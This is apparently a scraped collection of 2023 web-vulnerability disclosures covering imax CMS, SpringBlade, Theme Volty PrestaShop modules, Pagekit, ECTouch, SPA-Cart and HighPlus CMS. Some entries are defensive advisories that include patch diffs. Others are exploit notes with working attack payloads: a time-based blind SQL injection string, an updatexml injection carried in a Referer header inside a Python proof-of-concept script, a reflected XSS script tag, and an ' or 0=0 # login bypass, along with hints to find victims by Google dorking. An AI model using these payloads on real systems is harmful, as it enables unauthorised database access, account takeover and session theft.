imax CMS version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : imax CMS v1.0 Sql Injection Vulnerability                                                                          || # Author    : indoushka                                                                                                          | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://i-maxinfotech.com                                                                                           |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] http://127.0.0.1/cafesaffronnetau/view_page.php?id={{x.id}} <=====| inject here[+]  Panel :http://127.0.0.1/cafesaffronnetau/wp-admin/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

imax CMS 1.0 SQL Injection

In SpringBlade V3.6.0 when executing SQL query, the parameters submitted by the user are not wrapped in quotation marks, which leads to SQL injection.

**SpringBlade vulnerable to SQL injection**

High severity GitHub Reviewed Published Aug 29, 2023 to the GitHub Advisory Database • Updated Aug 31, 2023

GHSA-62pr-54gv-vg5g: SpringBlade vulnerable to SQL injection

CVE-2023-40787

\[description\]

In SpringBlade V3.6.0 when executing SQL query, the parameters

submitted by the user are not wrapped in quotation marks, which leads to SQL injection

\[Vulnerability Type\]

SQL Injection

\[Vendor of Product\]

https://github.com/chillzhuang/SpringBlade

\[Affected Product Code Base\]

SpringBlade - V3.6.0

\[Attack Type\]

Remote

\[Discoverer\]

cyvk

CVE-2023-40787: CVE-2023-40787

Theme Volty CMS Blog up to version v4.0.1 was discovered to contain a SQL injection vulnerability via the id parameter at /tvcmsblog/single.

In the module “Theme Volty CMS Blog” (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.

**Summary**

*   **CVE ID**: CVE-2023-39650
*   **Published at**: 2023-08-24
*   **Platform**: PrestaShop
*   **Product**: tvcmsblog
*   **Impacted release**: <= 4.0.1 (4.0.2 fixed the vulnerability)
*   **Product author**: Theme Volty
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

The method TvcmsBlogSingleModuleFrontController::run() have a sensitive SQL call that can be executed with a trivial HTTP call and exploited to forge a SQL injection.

If your server do not manage correctly these HTTP headers (which will be the case for all servers not managed by a professional system administrator), you are concerned:

*   CLIENT\_IP
*   X\_FORWARDED\_FOR
*   X\_FORWARDED
*   FORWARDED\_FOR
*   FORWARDED

See recommendations if needed about this.

This exploit uses a PrestaShop front controller and most attackers can conceal the module controller’s path during the exploit, so you will never know within your conventional frontend logs that it exploits this vulnerability. **You will only see “POST /” inside your conventional frontend logs.** Activating the AuditEngine of mod\_security (or similar) is the only way to get data to confirm this exploit.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data from the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to expose tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijack emails

**Patch from 4.0.1**

    --- 4.0.1/tvcmsblog/controllers/front/single.php
    +++ 4.0.2/tvcmsblog/controllers/front/single.php
    ...
        public function initContent()
        {
            $ipaddress = '';
            if (isset($_SERVER['HTTP_CLIENT_IP'])) {
                $ipaddress = $_SERVER['HTTP_CLIENT_IP'];
            } elseif (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
                $ipaddress = $_SERVER['HTTP_X_FORWARDED_FOR'];
            } elseif (isset($_SERVER['HTTP_X_FORWARDED'])) {
                $ipaddress = $_SERVER['HTTP_X_FORWARDED'];
            } elseif (isset($_SERVER['HTTP_FORWARDED_FOR'])) {
                $ipaddress = $_SERVER['HTTP_FORWARDED_FOR'];
            } elseif (isset($_SERVER['HTTP_FORWARDED'])) {
                $ipaddress = $_SERVER['HTTP_FORWARDED'];
            } elseif (isset($_SERVER['REMOTE_ADDR'])) {
                $ipaddress = $_SERVER['REMOTE_ADDR'];
            } else {
                $ipaddress = 'UNKNOWN';
            }
            $blogid = $this->blogpost['id_tvcmsposts'];
    
    -       $select_data = 'SELECT MAX(id_view) as max_id FROM `' . _DB_PREFIX_ . 'tvcmsposts_view` where `id_tvcmsposts` = ' . $blogid . ' AND `ipadress` = \'' . $ipaddress . '\' ';
    +       $select_data = 'SELECT MAX(id_view) as max_id FROM `' . _DB_PREFIX_ . 'tvcmsposts_view` where `id_tvcmsposts` = ' . (int) $blogid . ' AND `ipadress` = \'' . pSQL($ipaddress) . '\' ';
            $ans = Db::getInstance()->executeS($select_data);
    
            if (1 > $ans[0]['max_id']) {
                $dataquery = 'INSERT INTO `' . _DB_PREFIX_ . 'tvcmsposts_view`
                                    SET 
    -                                   `id_tvcmsposts` = ' . $blogid . ',
    +                                   `id_tvcmsposts` = ' . (int) $blogid . ',
    -                                    ipadress = \'' . $ipaddress . '\'';
    +                                    ipadress = \'' . pSQL($ipaddress) . '\'';
    

**Other recommendations**

*   It’s recommended to upgrade to the latest version of the module **tvcmsblog**.
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   These HTTP headers are not supposed to be used on a final application, since they should be used only if REMOTE_ADDR is allowed with modules like mod\_remoteip for Apache2, so you should auto-delete them if you are not behind a well setup load-balancer or reverse proxy.
*   Change the default database prefix ps_ with a new longer, arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skills because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against this set of rules.

**Timeline**

Date

Action

2023-02-10

Issue discovered during a code review by TouchWeb.fr

2023-02-10

Contact PrestaShop Addons security Team to confirm versions scope by author

2023-02-15

The author provided a patch, but it still contains all critical vulnerabilities.

2023-04-13

Recontact PrestaShop Addons security Team to confirm versions scope by author

2023-04-13

Request a CVE ID

2023-05-19

Author provide patch

2023-08-15

Received CVE ID

2023-08-24

Publish this security advisory

**Links**

*   PrestaShop addons product page
*   Author product page
*   National Vulnerability Database

CVE-2023-39650: [CVE-2023-39650] Improper neutralization of SQL parameters in Theme Volty CMS Blog module for PrestaShop

An issue in Pagekit pagekit v.1.0.18 alows a remote attacker to execute arbitrary code via thedownloadAction and updateAction functions in UpdateController.php

**Problem**

**There is a logical flaw that leads to obtaining shell access.**

**Technical Details**

*   Pagekit version: 1.0.18
*   Webserver: nginx
*   Database: mysql
*   PHP Version: 7.4

Vulnerability Path:  
app/installer/src/Controller/UpdateController.php  
Lines 32-72: downloadAction and updateAction functions  
The downloadAction function retrieves a file from a remote location to the local system.  
The updateAction function reads the downloaded file.  
Within it, the SelfUpdater function is called at app/installer/src/SelfUpdater.php.  
It includes the app/installer/requirements.php file from the remotely fetched file.  
This can lead to remote code execution.  
Based on this, constructing a zip file as follows:  
pagekit.zip

The data package is as follows

    POST /index.php/admin/system/update/download HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Connection: keep-alive
    Content-Length: 58
    Content-Type: application/x-www-form-urlencoded
    Cookie: Administrator's Cookie
    Host: localhost
    Referer: http://localhost/index.php/admin/system/update/download
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    
    url=constructed_zip_file&_csrf=4eb8d50f82ebae5b1fa16d5177d99ea7d740a8b2
    

    POST /index.php/admin/system/update/update HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cache-Control: max-age=0
    Connection: keep-alive
    Content-Length: 46
    Content-Type: application/x-www-form-urlencoded
    Cookie: Administrator's Cookie
    Host: localhost
    Referer: http://localhost /index.php/admin/system/update/update
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
    
    _csrf=4eb8d50f82ebae5b1fa16d5177d99ea7d740a8b2

CVE-2023-41005: There is a logical flaw that leads to obtaining shell access. · Issue #977 · pagekit/pagekit

theme volty tvcmsvideotab up to v4.0.0 was discovered to contain a SQL injection vulnerability via the component TvcmsVideoTabConfirmDeleteModuleFrontController::run().

In the module “Theme Volty Video Tab” (tvcmsvideotab) up to version 4.0.0 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.

**Summary**

*   **CVE ID**: CVE-2023-39652
*   **Published at**: 2023-08-24
*   **Platform**: PrestaShop
*   **Product**: tvcmsvideotab
*   **Impacted release**: <= 4.0.0 (4.0.1 fixed the vulnerability)
*   **Product author**: Theme Volty
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

The methods TvcmsVideoTabConfirmDeleteModuleFrontController::run() and TvcmsVideoTabSaveVideoModuleFrontController::run() has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.

This exploit uses a PrestaShop front controller and most attackers can conceal the module controller’s path during the exploit, so you will never know within your conventional frontend logs that it exploits this vulnerability. **You will only see “POST /” inside your conventional frontend logs.** Activating the AuditEngine of mod\_security (or similar) is the only way to get data to confirm this exploit.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data from the associated PrestaShop
*   Copy/paste data from sensitive tables to FRONT to expose tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijack emails

**Patch from 4.0.0**

    --- 4.0.0/tvcmsvideotab/controllers/front/confirmdelete.php
    +++ 4.0.1/tvcmsvideotab/controllers/front/confirmdelete.php
    class TvcmsVideoTabConfirmDeleteModuleFrontController extends ModuleFrontController
    {
        /**
         * @see FrontController::postProcess()
         */
        public function run()
        {
            $db = Db::getInstance(_PS_USE_SQL_SLAVE_);
        -   $id_product = Tools::getValue('id');
        +   $id_product = (int) Tools::getValue('id');
        -   $id_lang = Tools::getValue('id_lang');
        +   $id_lang = (int) Tools::getValue('id_lang');
            $id_shop = $this->context->shop->id;
        }
    }
    

    --- 4.0.0/tvcmsvideotab/controllers/front/savevideo.php
    +++ XXXXX/tvcmsvideotab/controllers/front/savevideo.php
    class TvcmsVideoTabSaveVideoModuleFrontController extends ModuleFrontController
    {
        public function run()
        {
            $ok = '';
            $id_lang_default = Configuration::get('PS_LANG_DEFAULT');
            $ob_lang_default = new Language($id_lang_default);
            $name_lang_default = $ob_lang_default->name;
    -       $id_shop = Tools::getValue('id_shop');
    +       $id_shop = (int) Tools::getValue('id_shop');
    -       $name_shop = Tools::getValue('name_shop');
    +       $name_shop = pSQL(Tools::getValue('name_shop'));
            $db = Db::getInstance(_PS_USE_SQL_SLAVE_);
            $url = $_SERVER['SCRIPT_FILENAME'];
            $url = rtrim($url, 'index.php');
            $languages = Language::getLanguages();
    -       $type_video = Tools::getValue('type_video');
    +       $type_video = pSQL(Tools::getValue('type_video'));
    -       $id_product = Tools::getValue('id_product');
    +       $id_product = (int) Tools::getValue('id_product');
    ...
                            $sql = 'REPLACE INTO ' . _DB_PREFIX_ . 'url_video ';
                            $sql .= '(id_video,id_product,id_store,text_url,language,shop,name_product,type,id_lang)';
                            $sql .= " VALUES ('" . $id_video . "','" . $id_product . "','" . $id_shop . "','";
    -                       $sql .= '' . trim($name_url_array[$value_lang['id_lang']]) . "','" . $value_lang['name'] . "','";
    +                       $sql .= '' . pSQL(trim($name_url_array[$value_lang['id_lang']])) . "','" . $value_lang['name'] . "','";
    ...
                            $sql = 'REPLACE INTO ' . _DB_PREFIX_ . 'url_video ';
                            $sql .= '(id_video,id_product,id_store,text_url,language,shop,name_product,type,id_lang)';
                            $sql .= " VALUES ('" . $id_video . "','" . $id_product . "','" . $id_shop . "','";
    -                       $sql .= '' . trim($name_url_array[$value_lang['id_lang']]) . "','" . $value_lang['name'] . "','";
    +                       $sql .= '' . pSQL(trim($name_url_array[$value_lang['id_lang']])) . "','" . $value_lang['name'] . "','";
    ...
                            $sql = 'REPLACE INTO ' . _DB_PREFIX_ . 'url_video ';
                            $sql .= '(id_video,id_product,id_store,text_url,language,shop,name_product,type,id_lang)';
                            $sql .= " VALUES ('" . $id_video . "','" . $id_product . "','" . $id_shop . "','";
    -                       $sql .= '' . trim($name_url_array[$value_lang['id_lang']]) . "','" . $value_lang['name'] . "','";
    +                       $sql .= '' . pSQL(trim($name_url_array[$value_lang['id_lang']])) . "','" . $value_lang['name'] . "','";
    

**Other recommendations**

*   It’s recommended to upgrade to the latest version of the module **tvcmsvideotab**.
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”) - be warned that this functionality **WILL NOT** protect your SHOP against injection SQL which uses the UNION clause to steal data.
*   Change the default database prefix ps_ with a new longer, arbitrary prefix. Nevertheless, be warned that this is useless against blackhats with DBA senior skills because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against this set of rules.

**Timeline**

Date

Action

2023-02-10

Issue discovered during a code review by TouchWeb.fr

2023-02-10

Contact PrestaShop Addons security Team to confirm versions scope by author

2023-02-15

Author provide a patch which still own all criticals vulnerabilities

2023-04-13

Recontact PrestaShop Addons security Team to confirm versions scope by author

2023-04-13

Request a CVE ID

2023-05-19

Author provide patch

2023-08-15

Received CVE ID

2023-08-24

Publish this security advisory

**Links**

*   PrestaShop addons product page
*   Author product page
*   National Vulnerability Database

CVE-2023-39652: [CVE-2023-39652] Improper neutralization of SQL parameter in Theme Volty Video Tab module for PrestaShop

ECTouch v2 was discovered to contain a SQL injection vulnerability via the $arr['id'] parameter at \default\helpers\insert.php.

#SQL Injection Vulnerability in ECTouch v2

###Vulnerability Position

In the insert\_bought\_notes function on line 285 in the \\ectouch-main\\include\\apps\\default\\helpers\\insert.php file, the incoming $arr\['id'\] parameter is not verified, resulting in a sql injection vulnerability.

###POC

Use python to write scripts for vulnerability verification.

#!/usr/bin/python
\# -\*- coding: utf-8 -\*-
\# @Author : qyg
\# @File : sqli check for ECTouch v2
\# @function : Detect for SQL injection vulnerabilities in ECTouch.

import requests,re

#your target
target \= 'http://127.0.0.1/'

payload \= '/index.php?m=default&c=user&a=register&u=0'

url \= target + payload

headers \= {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36 Edg/111.0.1661.54',
    'Referer': '554fcae493e564ee0dc75bdf2ebf94cabought\_notes|a:1:{s:2:"id";s:49:"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#";}'
}

response \= requests.get(url, headers\=headers)

print(response.text)

match \= re.search('XPATH syntax error: \\'~(.\*)~\\'',response.text)

if match:
    print("There is SQL injection vulnerability, and you are currently using the following database:" + match.group(1))

Running results:

CVE-2023-39560: GitHub - Luci4n555/cve_ectouch: detail

SPA-Cart eCommerce CMS version 1.9.0.3 suffers from a remote SQL injection vulnerability.

    # Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - SQL Injection# Exploit Author: CraCkEr# Date: 20/08/2023# Vendor: SPA-Cart# Vendor Homepage: https://spa-cart.com/# Software Link: https://demo.spa-cart.com/# Tested on: Windows 10 Pro# Impact: Database Access# CVE: CVE-2023-4548# CWE: CWE-89 - CWE-74 - CWE-707## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionSQL injection attacks can allow unauthorized access to sensitive data, modification ofdata and crash the application or make it unavailable, leading to lost revenue anddamage to a company's reputation.Path: /searchGET parameter 'filter[brandid]' is vulnerable to SQL Injectionhttps://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[SQLi]&filter[price]=100-500&filter[attr][Memory][]=500%20GB&filter[attr][Color][]=Black---Parameter: filter[brandid] (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)    Payload: filtered=1&q=11&load_filter=1&filter[brandid]=4'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z&filter[price]=100-500&filter[attr][Memory][]=500 GB&filter[attr][Color][]=Black---[-] Done

SPA-Cart eCommerce CMS 1.9.0.3 SQL Injection

SPA-Cart eCommerce CMS version 1.9.0.3 suffers from a cross site scripting vulnerability.

    # Exploit Title: SPA-Cart eCommerce CMS 1.9.0.3 - Reflected XSS# Exploit Author: CraCkEr# Date: 20/08/2023# Vendor: SPA-Cart# Vendor Homepage: https://spa-cart.com/# Software Link: https://demo.spa-cart.com/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4547# CWE: CWE-79 - CWE-74 - CWE-707## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushkaCryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /searchGET parameter 'filter[brandid]' is vulnerable to XSSGET parameter 'filter[price]' is vulnerable to XSShttps://website/search?filtered=1&q=11&load_filter=1&filter[brandid]=[XSS]&filter[price]=[XSS]&filter[attr][Memory][]=500%20GBXSS Payloads:vnxjb"><script>alert(1)</script>bvu51[-] Done

SPA-Cart eCommerce CMS 1.9.0.3 Cross Site Scripting

HighPlus CMS version 0.1.3 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : HighPlus CMS v0.1.3 Auth By pass Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://highplus.co.th/Highplus/login/AFMADS001.php                                                                 |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload :  user & pass = ' or 0=0 # [+] http://127.0.0.1wwwhighpluscoth/main/login.htmlGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Tag

#sql